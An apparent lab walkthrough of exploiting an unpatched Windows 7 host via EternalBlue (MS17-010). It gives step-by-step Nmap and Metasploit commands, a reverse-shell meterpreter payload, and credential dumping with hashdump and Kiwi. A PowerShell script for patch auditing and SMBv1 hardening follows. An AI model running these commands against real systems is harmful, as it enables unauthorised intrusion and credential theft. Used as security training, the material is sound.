🔧 Tools Used
- Kali Linux (Attacker)
- Windows 7 SP1 (Victim)
- Nmap
- Metasploit Framework
- SMBv1
- Command Line / Terminal
🔎 Step 1: Network Discovery
Use Nmap to identify hosts and open SMB ports on the network:
nmap -sS -sV -p 445 192.168.10.0/24
Expected output:
- Host: 192.168.10.12
- Port 445/tcp open
- Service: Microsoft Windows SMB
💣 Step 2: EternalBlue Exploitation (MS17-010)
Launch Metasploit:
msfconsole
Search for EternalBlue module:
search eternalblue
Use the SMB exploit module:
use exploit/windows/smb/ms17_010_eternalblue
Set required parameters:
set RHOST 192.168.10.12
set LHOST <your_kali_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
📟 Step 3: Post-Exploitation with Meterpreter
Once you gain a Meterpreter session:
getuid
sysinfo
hashdump
Dump credentials with the Kiwi extension:
load kiwi
creds_all
Capture evidence:
screenshot
download sensitive_files
🛡️ Step 4: Mitigation Recommendations
- Apply the Microsoft security update for MS17-010
- Disable SMBv1 protocol
- Use host-based firewalls to block unnecessary SMB traffic
- Segment internal networks
- Regularly update and monitor critical systems
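The first three mitigations, applied on the Windows 7 SP1 lab host. This is an added example and not part of the original write-up. It assumes an elevated PowerShell 2.0 session, the KB numbers are Microsoft's March 2017 updates for Windows 7 SP1, and the firewall rule name is an arbitrary label.

```powershell
# Added example: audit, then harden, a Windows 7 SP1 host against MS17-010.
# Run from an elevated prompt. Uses only what PowerShell 2.0 ships with
# (the Smb* and NetFirewall cmdlets do not exist on Windows 7).
$SrvParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# March 2017 security-only update and monthly rollup for Windows 7 SP1.
# Later monthly rollups supersede these, so a miss here is a prompt to check
# the update history, not proof that the host is unpatched.
$Ms17010Kbs = @('KB4012212', 'KB4012215')

function Test-Smb1ServerEnabled {
    # The SMBv1 server is on by default; only an explicit SMB1 = 0 disables it.
    $p = Get-ItemProperty -Path $SrvParams -Name SMB1 -ErrorAction SilentlyContinue
    return (-not $p) -or ($p.SMB1 -ne 0)
}

function Get-Ms17010Hotfix {
    Get-HotFix | Where-Object { $Ms17010Kbs -contains $_.HotFixID }
}

# --- Audit: record the state before changing anything ---
$found = @(Get-Ms17010Hotfix)
if ($found.Count -gt 0) {
    Write-Host "MS17-010 update present: $($found[0].HotFixID)"
} else {
    Write-Host "Neither $($Ms17010Kbs -join ' nor ') found; check update history"
}
Write-Host "SMBv1 server enabled: $(Test-Smb1ServerEnabled)"

# --- Harden ---
# 1. Disable the SMBv1 server (takes effect after a restart).
Set-ItemProperty -Path $SrvParams -Name SMB1 -Type DWord -Value 0 -Force

# 2. Disable the SMBv1 client: remove mrxsmb10 from the workstation service's
#    dependencies, then stop the driver from loading.
sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled

# 3. Block inbound SMB at the host firewall. Skip this on machines that must
#    serve file shares; scope those with remoteip= instead of blocking outright.
netsh advfirewall firewall add rule name="Block-Inbound-SMB-445" dir=in action=block protocol=TCP localport=445

Write-Host "Restart required. SMBv1 server enabled after change: $(Test-Smb1ServerEnabled)"
```

Re-running the Step 1 Nmap scan against the host after the restart confirms whether port 445 is still reachable.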
✅ Outcome
- Gained SYSTEM-level access on unpatched Windows 7 via EternalBlue
- Captured user hashes, screenshots, and sensitive files
- Validated risk of unpatched legacy systems in production



